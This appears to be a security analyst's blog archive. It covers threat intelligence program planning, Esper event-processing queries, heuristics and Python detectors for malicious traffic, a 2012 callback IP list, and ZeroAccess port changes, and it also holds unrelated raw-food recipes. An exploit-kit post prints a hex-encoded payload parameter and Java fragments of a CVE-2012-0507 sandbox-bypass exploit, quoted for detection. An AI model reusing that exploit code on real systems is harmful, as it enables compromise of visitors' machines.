Threat Intel Program – Quick Reference
Cyber Attack Taxonomy
Threat Intel Taxonomy
Threat Intel Classification
- Strategic
- Operational
- Tactical
Threat Intel vs Cyber Attacks
Adversaries vs Targets
US TRADOC Cyber Operations Model – Sample
Threat Intel Program Checklist
https://intel471.com/threatintelprogramchecklist.pdf
- Biannual process in place to derive, update and capture prioritized intelligence requirements (PIRs) that map to your organization’s business risks.
- Tracking of ad hoc requirements that meet and do not meet standing PIRs in order to identify emerging intelligence needs and requirements.
- Documented intelligence production requirements.
- Documented collection requirements.
- Documented mapping of collection requirements to internal teams/capabilities or external (intelligence) providers/vendors (guidance).
- Regular assessment and tracking of guidance versus output from internal capabilities and external (intelligence) providers/vendors (collection management).
- Intelligence collection is easily consumable, i.e. in a threat intelligence platform (TIP).
- Documented intelligence production style guide.
- Documented intelligence review and editing process.
- Formalized intelligence product style and templates.
- Intelligence products include future predictions and don't just report facts.
- Sources used in intelligence products are linked to the relevant source and graded.
- Knowledge gaps are identified in intelligence products and pushed back into the requirements part of the intelligence cycle.
- Feedback is received from your intelligence consumer/customer and used to drive further intelligence collection and production if needed.
- Key Performance Indicators (KPIs) are generated for the intelligence program.
- KPIs are generated for each part of the intelligence cycle including for internal and external sources of finished intelligence products and intelligence collection.
- An intelligence (collection) management function exists that tracks and prioritizes requirements and tasks them out as assigned guidance.
References/Additional Resources
- Threat Intel Program Checklist
- Definitive Guide to Cyber Threat Intelligence
- SANS – Defining Threat Intelligence Requirements
- Lockheed Martin – Threat Driven Approach
- Ten Strategies of World-Class SOC, Chapter 11: Be a Sophisticated Consumer and Producer of Cyber Threat Intelligence (2014)
- Threat Intelligence and the Paradigm Shift in Cyber Defense – Neal Rothleader
- Intelligence-Driven Security: A New Model using Big Data – RSA
- Introduction: Recorded Future Cyber threat intelligence Application
- https://www.ncsc.gov.uk/content/files/protected_files/guidance_files/MWR_Threat_Intelligence_whitepaper-2015.pdf
- Securosis – Building a Threat Intelligence Program (May 2016)
Intro to Event Stream Analysis (ESA) & Complex Event Processing (ESPER)
Exploring Event Driven Architectures with Esper
https://www.infoq.com/news/2007/05/esper
- Event stream processing (ESP)
- monitors streams of event data, analyzing those events for matching conditions and then notifies listeners
- Complex event processing (CEP)
- allows the detection of patterns among events
WHAT IS COMPLEX EVENT PROCESSING (CEP)?
Complex Event Processing (CEP), or Event Stream Processing (ESP), are technologies commonly used in event-driven systems. These systems consume and react to a stream of event data in real time. Typically these are things like financial trading, fraud identification and process monitoring systems, where you need to identify, make sense of, and react quickly to emerging patterns in a stream of data events.
KEY COMPONENTS OF A CEP SYSTEM
A CEP system is like your typical database model turned upside down. Whereas a typical database stores data and runs queries against the data, a CEP engine stores queries and runs data through the queries.
To do this it basically needs:
- Data – in the form of ‘Events’
- Queries – using EPL (‘Event Processing Language’)
- Listeners – code that ‘does something’ if the queries return results
The Esper query language provides a rich syntax allowing complex temporal logic to be expressed, and includes features such as:
- Event filtering
- Sliding window and aggregation (count all assets reported in the last 30 seconds)
- Grouped windows and output rate limiting (get a count per zone of the last 10 minutes per zone)
- Joins and outer joins (also joins between event streams)
- Integration with historic or reference data (accessing relational databases)
- Creation of virtual streams that all statements can access
References
- Introduction to EQL and Patterns: http://www.onjava.com/pub/a/onjava/2007/03/07/esper-event-stream-processing-and-correlation.html?page=2
- CEP Example: http://corsoftlimited.blogspot.co.uk/2013/02/complex-event-processing-made-easy.html
Examples
- Esper EQL is an object-oriented event stream query language, very similar to SQL in its syntax, but differing significantly so that it can deal with sliding windows over streams of data.
- Esper also includes a pattern language that provides for stateful (state-machine) event pattern matching.
- EQL and patterns can be used alone or can also be combined to express complex temporal logic.
Example 1: Terminal Monitoring/Alerting
Events are as below:
- BaseTerminalEvent (super event)
- Checkin, Completed, Cancelled, Status, OutOfOrder, LowPaper (inherited events)

| EPL statement | Meaning |
|---|---|
| `select * from LowPaper` | Report when a LowPaper event is observed |
| `select * from LowPaper` and `select * from OutOfOrder` (two statements) | Report when a LowPaper event is observed; report when an OutOfOrder event is observed |
| `select a,b from pattern` | Report when a LowPaper event is observed and when an OutOfOrder event is observed |
| `select * from BaseTerminalEvent where type = 'LowPaper' or type = 'OutOfOrder'` | Report when a LowPaper or an OutOfOrder event is observed |
| `select 'terminal 1 is offline' from pattern [ every timer:interval(60 sec) -> (timer:interval(65 sec) and not Status(term.id = 'T1')) ]` | Detecting the absence of Status events; the check is repeated every 60 seconds |
| `select count(*) from Checkin.win:time(10 minutes)` | Report the number of Checkin events during a window of 10 minutes |
| `select type, count(*) from BaseTerminalEvent.win:time(10 minutes) group by type output all every 1 minutes` | Over a window of the last 10 minutes of BaseTerminalEvent, alert every 1 minute rather than at each change |
Example 2: Tweets Monitoring (https://www.igvita.com/2011/05/27/streamsql-event-processing-with-esper/)
| EPL statement | Meaning |
|---|---|
| `SELECT sum(retweets) from TweetEvent` | Find the sum of retweets of the last 5 tweets which saw more than 10 retweets |
| `SELECT timezone, sum(retweets) from TweetEvent.win:time_batch(10 sec) group by timezone` | Number of retweets, grouped by timezone, buffered in 10-second increments |
| `SELECT sum(retweets) from TweetEvent.win:time(60 sec) output snapshot every 30 events` | Report the sum of retweets for TweetEvents in a sliding 60-second window, and emit the count every 30 events |
| `SELECT timezone, sum(retweets)` | Report the total number of retweets by timezone for TweetEvents in 10-second batches, where the TweetEvents are grouped by timezone, and report a window only if its total retweets > 10 |
Side notes

| Fragment | Meaning |
|---|---|
| `Checkin.win:time(10 minutes)` | Tells the engine to consider a time window consisting of only the last 10 minutes of the Checkin event stream |
| `TweetEvent.win:time_batch(10 sec)` | Buffered in 10-second increments |
| `output first every 5 minutes` | Alert the first time the pattern matches and suppress for the next 5 minutes |
| `output all every 1 minutes` | Alert every 1 minute and not at each change |
| `output snapshot every 30 events` | Alert every 30 events that matched the pattern |
| `Status(term.id = 'T1')` | Status event where term.id = 'T1' |
Artifacts of Malicious Traffic
While investigating suspicious traffic, it is important for an analyst to be clear about what is really suspicious and what is not.
Below are a few artifacts an analyst can observe to conclude whether traffic is malicious.
ARTIFACTS OF MALICIOUS IP
1) IP belongs to a high-risk hosting provider or is an Internet user (end-user) IP
2) Has malicious references on sites such as Sophos.com, mcafee.com, urlquery.net, snort.org, threatexpert.org, virustotal.com, malwr.org, xml.sandbox.net, etc.
ARTIFACTS OF MALICIOUS DOMAIN
If at least three of the criteria below are matched, the domain is considered malicious:
1) Domain is NOT popular
2) Has malicious references on sites such as Sophos.com, mcafee.com, urlquery.net, snort.org, threatexpert.org, virustotal.com, malwr.org, xml.sandbox.net, etc.
3) Domain was created less than 1 year ago
4) Bluecoat category is none / Suspicious / Malicious Sources / Malicious Botnets / Dynamic DNS Hosts
5) No site description
ARTIFACTS OF MALICIOUS WEB HEADER
1) The User-Agent field gives an idea of what the application is.
Some malware uses a UA that appears legitimate; hence check the UA used in other traffic from that IP at the same time.
Some malware uses exactly the UA that the browser on the infected machine uses. In that case check the other header fields described below to confirm whether the web request was made by the browser or by malware.
2) The fields below in the header indicate the request was made by a browser.
If they are not present, the request was most likely made by malware or some other application:
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
…
Cache-Control: max-stale=0
Pragma: no-cache
Connection: Keep-Alive
3) The Referer field gives a clue as to where the user was redirected from.
After confirming that the web request was made by a browser:
If the Referer field is available,
a) If the Referer URL is yahoomail.com/live.com/gmail.com, it indicates the user was infected via phishing/spam
b) If the Referer URL is a good blog/forum, it indicates the user was infected via a compromised site
If the Referer field is unavailable, the user might have been phished/spammed (user clicking a link from an email in Outlook).
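The domain rule and the header heuristic above, written out as code (an added example, mine rather than the post's): a scorer that applies the three-of-five domain criteria, and a request classifier that first checks for the browser fields listed and then applies the Referer reasoning. The domain record layout, the two sample requests, the category strings and the review date are constructed; on the wire the header is spelled `Referer`, which the parser uses.

```python
from datetime import date

# Bluecoat categories the post treats as an artifact (strings as listed there).
SUSPECT_CATEGORIES = {"none", "Suspicious", "Malicious Sources",
                      "Malicious Botnets", "Dynamic DNS Hosts"}
# Header fields the post says a browser sends.
BROWSER_FIELDS = ("Accept", "Accept-Language", "Accept-Encoding", "Connection")
WEBMAIL_HOSTS = ("yahoomail.com", "live.com", "gmail.com")


def domain_artifact_score(info, today):
    """Count how many of the five domain criteria match. `info` is a constructed
    dict layout for what an analyst would gather, not a real feed format."""
    criteria = [
        not info["popular"],                          # 1) domain is NOT popular
        info["malicious_references"] > 0,             # 2) flagged by reputation sites
        (today - info["created"]).days < 365,         # 3) created less than a year ago
        info["category"] in SUSPECT_CATEGORIES,       # 4) suspect Bluecoat category
        not info["site_description"],                 # 5) no site description
    ]
    return sum(criteria)


def domain_is_malicious(info, today):
    return domain_artifact_score(info, today) >= 3


def parse_headers(raw_request):
    """Split a raw HTTP request into (request line, {lowercased name: value})."""
    lines = raw_request.strip("\r\n").split("\n")
    headers = {}
    for line in lines[1:]:
        line = line.rstrip("\r")
        if not line:            # blank line ends the header block
            break
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0].rstrip("\r"), headers


def classify_request(raw_request):
    """Return (origin, note): origin is 'browser' when every browser field is
    present, else 'non-browser'; the note applies the Referer reasoning."""
    _, h = parse_headers(raw_request)
    missing = [f for f in BROWSER_FIELDS if f.lower() not in h]
    if missing:
        return "non-browser", "missing " + ", ".join(missing)
    referer = h.get("referer", "")
    if not referer:
        return "browser", "no Referer: link likely clicked from a mail client (phishing/spam)"
    if any(host in referer for host in WEBMAIL_HOSTS):
        return "browser", "Referer is webmail: phishing/spam"
    return "browser", "Referer " + referer + ": possibly a compromised site"


# Constructed samples (not captured traffic); .invalid is a reserved TLD.
BROWSER_REQUEST = """GET /update.php HTTP/1.1
Host: example-suspect.invalid
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:14.0) Gecko/20100101 Firefox/14.0.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://mail.live.com/
Connection: Keep-Alive
"""
BEACON_REQUEST = """POST /gate.php HTTP/1.1
Host: example-suspect.invalid
User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:14.0) Gecko/20100101 Firefox/14.0.1
Content-Length: 0
"""
REVIEW_DATE = date(2012, 8, 16)   # constructed reference date for the age check
SUSPECT_DOMAIN = {"popular": False, "malicious_references": 2, "created": date(2012, 5, 1),
                  "category": "none", "site_description": ""}
BENIGN_DOMAIN = {"popular": True, "malicious_references": 0, "created": date(2005, 1, 1),
                 "category": "Search Engines/Portals", "site_description": "Web search"}

if __name__ == "__main__":
    print(domain_artifact_score(SUSPECT_DOMAIN, REVIEW_DATE), domain_is_malicious(SUSPECT_DOMAIN, REVIEW_DATE))
    print(classify_request(BROWSER_REQUEST))
    print(classify_request(BEACON_REQUEST))
```

The beacon sample carries the same User-Agent as the browser sample, which is exactly the case the post describes: the UA alone says nothing, and it is the absence of Accept, Accept-Language, Accept-Encoding and Connection that separates the two.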
Callback IP List – 16/8/2012
76.89.34.249
72.64.7.218
180.252.254.254
68.11.109.233
129.219.58.25
78.137.161.116
50.81.200.245
173.19.2.108
207.255.241.104
173.30.234.10
208.157.180.50
72.188.70.228
66.55.89.150
201.51.3.12
112.121.178.189
2.180.53.52
108.162.40.50
78.21.199.217
94.249.188.62
72.218.128.8
68.169.130.253
99.250.220.29
151.25.5.119
88.254.254.254
88.253.254.254
74.194.104.238
87.97.119.9
72.213.131.9
1.83.113.212
99.66.12.13
173.216.128.155
83.249.254.254
75.133.57.195
117.254.254.254
74.219.99.6
98.124.25.14
178.202.35.2
93.184.100.116
87.29.249.57
85.197.78.132
95.252.254.254
72.184.62.10
75.254.254.254
211.133.212.24
98.28.19.232
66.55.89.151
91.217.162.127
24.149.99.210
101.62.103.183
80.241.255.250
209.20.78.241
72.195.180.4
94.87.149.237
180.254.54.24
88.231.50.39
166.241.196.245
203.130.129.58
75.31.80.44
66.69.153.23
65.25.182.4
114.112.53.236
184.160.38.195
195.210.47.109
173.21.193.44
114.202.247.182
77.81.225.253
146.185.255.194
64.207.75.5
65.26.230.204
125.214.75.185
197.253.254.254
98.155.210.211
67.84.56.7
173.29.245.12
98.142.19.14
201.167.9.175
1.254.254.254
66.75.229.201
91.62.38.21
12.232.108.243
69.146.1.218
115.84.185.25
42.201.148.6
201.250.254.254
97.100.132.19
109.121.197.5
190.253.254.254
67.240.187.215
88.252.254.254
94.253.254.254
24.89.93.11
ZeroAccess/Sirefef Update
Until last week, ZeroAccess/Sirefef-infected hosts were contacting the C&C domain on ports 16464, 16465, 16470 and 16471.
It has now switched to port 34354, and that is what is going on in the wild.
Watch your network for machines going out to Internet IPs on this port.
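A way to do that watching over flow records, as an added example (my code, not from the post): flag flows from an internal host to an Internet address whose destination port is one of the five ports named above, ignoring internal-to-internal traffic. The flow line format, the internal address ranges and the flow records themselves are constructed for the demonstration; adjust the ranges to the organisation's own.

```python
import ipaddress

# Ports named in the post: the earlier C&C ports and the one it switched to.
ZEROACCESS_PORTS = {16464, 16465, 16470, 16471, 34354}

# Assumed internal address space (RFC 1918); replace with the organisation's real ranges.
INTERNAL_NETS = [ipaddress.ip_network(n)
                 for n in ("10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16")]

# Constructed flow records (not real traffic), one per line:
# "timestamp src_ip:src_port -> dst_ip:dst_port proto"
SAMPLE_FLOWS = """\
2012-08-20T10:00:01 10.0.0.5:51234 -> 203.0.113.7:34354 udp
2012-08-20T10:00:02 10.0.0.5:51235 -> 198.51.100.9:443 tcp
2012-08-20T10:00:05 10.0.0.9:40000 -> 203.0.113.20:16464 tcp
2012-08-20T10:00:06 10.0.0.9:40001 -> 10.0.0.1:34354 udp
2012-08-20T10:00:09 10.0.0.12:40010 -> 192.0.2.33:80 tcp
"""


def is_internal(ip):
    addr = ipaddress.ip_address(ip)
    return any(addr in net for net in INTERNAL_NETS)


def parse_flow(line):
    """Parse one constructed flow line into a dict."""
    ts, src, _, dst, proto = line.split()
    src_ip, src_port = src.rsplit(":", 1)
    dst_ip, dst_port = dst.rsplit(":", 1)
    return {"ts": ts, "src": src_ip, "dst": dst_ip,
            "dport": int(dst_port), "proto": proto}


def flag_zeroaccess_flows(flow_text):
    """Return (src, dst, dport) for every flow from an internal host to a
    non-internal address on one of the ZeroAccess ports."""
    hits = []
    for line in flow_text.splitlines():
        if not line.strip():
            continue
        f = parse_flow(line)
        if (f["dport"] in ZEROACCESS_PORTS
                and is_internal(f["src"]) and not is_internal(f["dst"])):
            hits.append((f["src"], f["dst"], f["dport"]))
    return hits


if __name__ == "__main__":
    for hit in flag_zeroaccess_flows(SAMPLE_FLOWS):
        print("possible ZeroAccess peer traffic:", hit)
```

The internal-destination filter matters: port 34354 from one internal host to another (the fourth sample line) is dropped, so the output is the two hosts that actually reached out to the Internet on the named ports.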
New Mode of Delivering Malware Payload by Exploit Kits
Huh… exploit writers have come up with a new way of delivering the malware payload.
The usual exploit-kit pattern is: malicious webpage -> exploit (Java/PDF/other) -> the exploit downloads the malicious executable.
We have devised signatures for these patterns, so malware authors have come up with a new mode of delivering the payload.
They embed the malware payload as HEX in the malicious webpage and pass it as a parameter to the exploit.
The exploit bypasses security controls, writes the HEX out as a file and runs it on the victim system.
Malicious webpage that triggers the exploit applet. The param, converted to binary and XOR'd with 0x77, yields an EXE:
<param name="data" value="3A2DE777747777777377777788887777CF777777777777773777777…
Code that reads the Malware Payload Content
try {
    ConfusingClassLoader confusingclassloader = confuser.confuse(getClass().getClassLoader());
    String as[] = { "m.y.py", "m.y.py$pr" };
    String as1[] = { "/m/y/py.class", "/m/y/py$pr.class" };
    String s = getParameter("lport");
    // "data" is the applet parameter holding the hex-encoded payload shown above
    ConfusingClassLoader.defineAndCreate(confusingclassloader, as,
        new byte[][] { loadClass(as1[0]), loadClass(as1[1]) },
        getParameter("data"), getParameter("jar"), getParameter("lhost"),
        s != null ? Integer.parseInt(s) : 4444);
}
Exploit code (Java/CVE-2012-0507) that bypasses security restrictions
public static void defineAndCreate(ConfusingClassLoader confusingclassloader, String as[], byte abyte0[][],
        String s, String s1, String s2, int i) {
    try {
        // the loaded classes are defined under a ProtectionDomain that grants AllPermission
        Permissions permissions = new Permissions();
        permissions.add(new AllPermission());
        ProtectionDomain protectiondomain = new ProtectionDomain(new CodeSource(null, new Certificate[0]), permissions);
        Class class1 = confusingclassloader.defineClass(as[0], abyte0[0], 0, abyte0[0].length, protectiondomain);
        confusingclassloader.defineClass(as[1], abyte0[1], 0, abyte0[1].length, protectiondomain);
        // the applet parameters (data, jar, lhost, lport) are handed to static fields of the defined class
        Field field = class1.getField("data");
        Field field1 = class1.getField("jar");
        Field field2 = class1.getField("lhost");
        Field field3 = class1.getField("lport");
        field.set(null, s);
        field1.set(null, s1);
        field2.set(null, s2);
        field3.set(null, Integer.valueOf(i));
        class1.newInstance();
    }
Code that writes the content to file
try
{
    bufferedreader = new BufferedReader(new InputStreamReader(is));
    bufferedwriter = new BufferedWriter(new OutputStreamWriter(os));
    char ac[] = new char[8192];
    int i;
    // copy the decoded payload stream to the output file in 8 KB chunks
    while((i = bufferedreader.read(ac, 0, ac.length)) > 0)
    {
        bufferedwriter.write(ac, 0, i);
        bufferedwriter.flush();
    }
}
Just scratching my head how to detect it?
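The post's own observation gives one detection hook: the param value is hex, and XOR with 0x77 turns it back into an EXE. The first two bytes shown in the captured value, 3A 2D, XOR 0x77 are 4D 5A, which is the "MZ" DOS header every Windows executable starts with. The added example below (my code, not from the post) scans HTML for applet params carrying long hex values, derives the single-byte XOR key from the expected "M" and confirms it against the expected "Z", so it does not depend on the key staying 0x77. The sample page, the applet attributes and the 64-byte stand-in payload are constructed; the stand-in is not a real executable.

```python
import binascii
import re

MIN_HEX_CHARS = 64   # ignore short param values; an embedded executable is far longer

# <param name="..." value="<hex>"> in the attribute order seen in the captured page
PARAM_RE = re.compile(r'<param\s+[^>]*?name="([^"]+)"[^>]*?value="([0-9A-Fa-f]+)"', re.I)


def xor_bytes(data, key):
    return bytes(b ^ key for b in data)


def xor_key_for_mz(blob):
    """Derive the single-byte key that turns blob[0] into 'M' and confirm it
    also turns blob[1] into 'Z'; return the key, or None if there is no such key."""
    if len(blob) < 2:
        return None
    key = blob[0] ^ ord("M")
    return key if blob[1] ^ key == ord("Z") else None


def scan_html(html):
    """Report every applet param whose hex value, after a single-byte XOR,
    starts with the MZ header: {param name, recovered key, payload length}."""
    findings = []
    for name, hexval in PARAM_RE.findall(html):
        if len(hexval) < MIN_HEX_CHARS or len(hexval) % 2:
            continue
        blob = binascii.unhexlify(hexval)
        key = xor_key_for_mz(blob)
        if key is not None:
            findings.append({"param": name, "xor_key": key, "payload_bytes": len(blob)})
    return findings


# Constructed stand-in payload: an MZ header stub padded to 64 bytes, not a real executable.
FAKE_EXE = b"MZ\x90\x00" + b"\x00" * 60
# Constructed page that embeds it the way the post describes (hex, XOR 0x77).
SAMPLE_HTML = (
    '<applet code="Loader.class" archive="applet.jar" width="1" height="1">'
    '<param name="data" value="' + xor_bytes(FAKE_EXE, 0x77).hex().upper() + '">'
    '<param name="lport" value="4444">'
    '</applet>'
)

if __name__ == "__main__":
    for finding in scan_html(SAMPLE_HTML):
        print("hex-embedded executable in param %(param)s, XOR key 0x%(xor_key)02x, "
              "%(payload_bytes)d bytes" % finding)
```

Because the zero padding XOR 0x77 becomes a run of `77` bytes, the constructed value looks much like the captured one, which is full of 7s; a long hex param that decodes to "MZ" under some single-byte key is a strong signal for a proxy or IDS content rule regardless of which key the kit uses next.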
Raw Food recipes from Life Regenerator Dan
(http://www.regenerateyourlife.org/)
Notes Compiled by Uma Mahesh
- Almond Coconut Yogurt
Blend
Mung Bean Salad
Salad
Sprouted Mung beans + kottimera + tomato + onions
Salad Dressing
Olive Oil + Orange Juice + Sea Salt
Spicy Cabbage Almond Salad
Salad
Cabbage + Almond
Salad Dressing
Apple Cider Vinegar + Honey + Garlic Powder
+ Pandu Mirapakai Karam + Saindhava Lavanam
Sesame tahini
Salad Dips
Blend
1 cup Sesame seeds + 4 cloves of garlic + Zucchini +
Dates + Lemon (/Orange) + Water(/Coconut water)
Salad
Carrot, Broccoli, Cauliflower, any veggie
Coconut Almond Yogurt & Avocado Dressing
Salad Dressing
Blend
Basil/kottimera (Any herb) +
Coconut Almond Yogurt +
Dates + Garlic Cloves + Saindava Lavanam
+ Pandu Mirapa (If required hot)
Salad
Lettuce (Any Leafy Veggie) + Sprouts + Onion + Cucumber
Raw Tacos
Cilantro -> Kottimira
Salad Base (Taco Meat)
Blend
Walnuts + Cumin + Paprika + Sea Salt
Salad Cheese
Sprouted pumpkin seeds + Nutritional Yeast
Guacamole Salad
Salad Dressing
Crush
(Tomatoes + Onions + Garlic + Chili + Kottimera)
+ Avocado + Corn
Salad
Zucchini slices
Butternut Squash Pasta
Blend (Squash Pasta)
Tomatoes ( + Sun Dried Tomatoes) + Kottimira + Olive oil
+ lemon + garlic + sea salt + oregano + (All Herb Powders)
Salad
Gummadikayi noodles (Shredder (gummadikai) )
Mango Dill Jalapeno Dressing
Blend (Dips)
Mangoes + Mint Leaves + Pachimirapakai
Salad
Romaine Lettuce
Butternut Squash Pudding
Blend
Pumpkin + Coconut almond yogurt + protein powder + cinnamon
Business case to convince Management for Security Incident Response center
Today I am reading through a Mandiant document named "Planning for Failure". It contains real data that emphasizes breaches and the necessity to plan for failure to protect. For any company or security consultancy, that real data can be used in a business case for getting a security budget. Hence I am including that document here.
This document can also be helpful to a CISO to show to management, and as startup guidelines to initiate building up an Incident Response Center.
http://fred.mandiant.com/planning_for_failure.pdf
PCI Compliance Dashboard guiding PCI Compliance journey
A well-composed guide for PCI compliance;
it includes the "SANS Top 20 Critical Security Controls" and many others.
It gives simple and clear guidelines for ensuring security in any organization, irrespective of a PCI compliance mandate.
It can be downloaded from https://community.rapid7.com/docs/DOC-1512